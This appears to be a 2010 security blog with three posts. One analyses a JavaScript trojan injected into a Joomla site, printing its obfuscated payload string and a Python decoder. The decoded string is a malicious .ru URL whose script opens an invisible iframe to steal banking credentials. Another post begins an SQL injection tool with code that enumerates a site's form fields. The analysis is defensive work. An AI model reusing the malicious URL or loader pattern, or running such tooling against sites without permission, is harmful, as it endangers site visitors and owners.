Saturday, January 16, 2010

Analysis of a Javascript Trojan found on a joomla based website

Yesterday, I got my first freelance job. The owner of the website described that users are complaining that their spyware detection application alerts whenever they open some pages on the website.
It didn't take a while to figure out where the Trojan is hiding and how its attacking.
As soon as I opened the about and the contact pages, Nod32 alerted that the pages I'm viewing contain a malicious javascript. When i viewed the source code I saw this suspicious script:







The interesting part is that strange code that starts from line 7 to line 13. This code is  the second parameter of the setAttribute function. It looks like this: setAttribute('src', strange code).
This function is used to set the value of an attribute on an object. It is typically used along with objects returned by document.getElementById to assign a new value to the object's attribute.
Notice the string.replace function at line 13? it replaces the charactes !, @, #, $, %, ^, &, (, ) with blank. I created a simple Python code that does this replacement:
import sys

strange_code = 'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^&(c(o^#m@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$!(s@$@i^@c@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m)@&/@!!i&n^#!.&#!c)))!o(m#/)((!'

strange_code = strange_code.replace('!', '')
strange_code = strange_code.replace('@', '')
strange_code = strange_code.replace('#', '')
strange_code = strange_code.replace('$', '')
strange_code = strange_code.replace('%', '')
strange_code = strange_code.replace('^', '')
strange_code = strange_code.replace('&', '')
strange_code = strange_code.replace('(', '')
strange_code = strange_code.replace(')', '')

print strange_code
The result:

http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/

Basically this script adds a reference to a javascript file that is located at the address above. I followed the address of this file and found a script that opens an invisible iframe. By this invisible iframe the attackers can steal information such as online banking credentials.
How to remove this this Trojan?
Simply remove it from every page you find it in.
How to avoid it from infecting your files again?
It probably infected the files through the FTP, so:
1. Change your FTP credentials.
2. Install a good anti-spyware application.
3. Don't use public machines to access your FTP.
4. Check the files that users are uploading to your website.

Friday, January 8, 2010

Automatic SQL injection tool using Python - Part 1

This is a first post of several, in which I'll create a simple SQL injection tool using Python. Actually this is also the first time I program in Python, so comments and improvements suggestions are welcome.
In order to automate the injection we must first discover the injection points. The injection points are the HTML form parameters (POST and GET parameters). To extract those parameters I used BeautifulSoup, which is a simple and effective HTML parser.
With BeautifulSoup its easy to build applications that process web pages, such as a web scraper. You can get the parser from this website www.crummy.com/software/BeautifulSoup/download/3.x/BeautifulSoup-3.0.0.py. Change the name of the file to BeautifulSoup.py and then place it under the site-packages folder. For example if you use Windows OS and Python 2.5, it should be under "C:\Python25\Lib\site-packages", if you use Linux OS and Python 2.5, it should be under "/usr/lib/python2.5/site-packages".
The code:

import urllib2,sys

if len(sys.argv) != 3:
print "Usage: post_params.py [GET/POST] [url]"
sys.exit(1)

method = sys.argv[1].lower()
address = sys.argv[2]
if address.find('\\') != -1:
address = address[:-1]

# load the html page into a string variable
html = urllib2.urlopen(address).read()

from BeautifulSoup import BeautifulSoup

#load the string into a BeautifulSoup object and 'prettify' the code
soup = BeautifulSoup(html)

def printParams(forms):
# for each form tag in all form tags, do:
for form in forms:
print "-----------------------------------------------------------"
if form.has_key('action'):
if form['action'].find('://') == -1:
print "action: " + address + "/" + form['action'].strip('/')
else:
print "action: " + address
else:
print "action: " + address
if method == "post":
if form.has_key('method') and form['method'].lower() == 'post':
for post_input in form.findAll("input"):
if post_input.has_key('type'):
if post_input['type'].lower() == 'text' or \
post_input['type'].lower() == 'password' or \
post_input['type'].lower() == 'hidden'or \
post_input['type'].lower() == 'radio':
if post_input.has_key('id'):
print post_input['id']
elif post_input.has_key('name'):
print post_input['name']
elif method == "get":
if form.has_key('method') and form['method'].lower() == 'get' or \
not form.has_key('method'):
for get_input in form.findAll("input"):
if get_input.has_key('type'):
if get_input['type'].lower() == 'text' or \
get_input['type'].lower() == 'password' or \
get_input['type'].lower() == 'hidden'or \
get_input['type'].lower() == 'radio':
if get_input.has_key('id'):
print get_input['id']
elif get_input.has_key('name'):
print get_input['name']

# find all occurrences of the form tag and send it to printParams
printParams(soup.findAll("form"))

You can also download the source file from here.
Usage: form_params.py method url
method: post or get
example: form_params.py post http://www.facebook.com
result:

-----------------------------------------------------------
action: http://www.facebook.com
charset_test
locale
non_com_login
email
pass
pass_placeholder
charset_test
lsd
-----------------------------------------------------------
action: http://www.facebook.com
charset_test
locale
terms
reg_instance
firstname
lastname
reg_email__
reg_passwd__
referrer
challenge
md5pass
captcha_persist_data
captcha_session
extra_challenge_params
captcha_response
-----------------------------------------------------------
action: http://www.facebook.com
locale
confirmation_email

-Herzel

Saturday, January 2, 2010

My first blog post

Welcome to my first post.
In this blog I intend to write mostly about my experience and discoveries with information security related issues.
Recently I started working at AppliCure Technologies, which is a software company who's main product is a WAF (Web Application Firewall).
The world of information security always intrigued me, but I never addressed it seriously. Well, I hope to change that now.
Later on I intend to share discoveries, write code or maybe just express an opinion. Hope you enjoy this blog.

- Herzel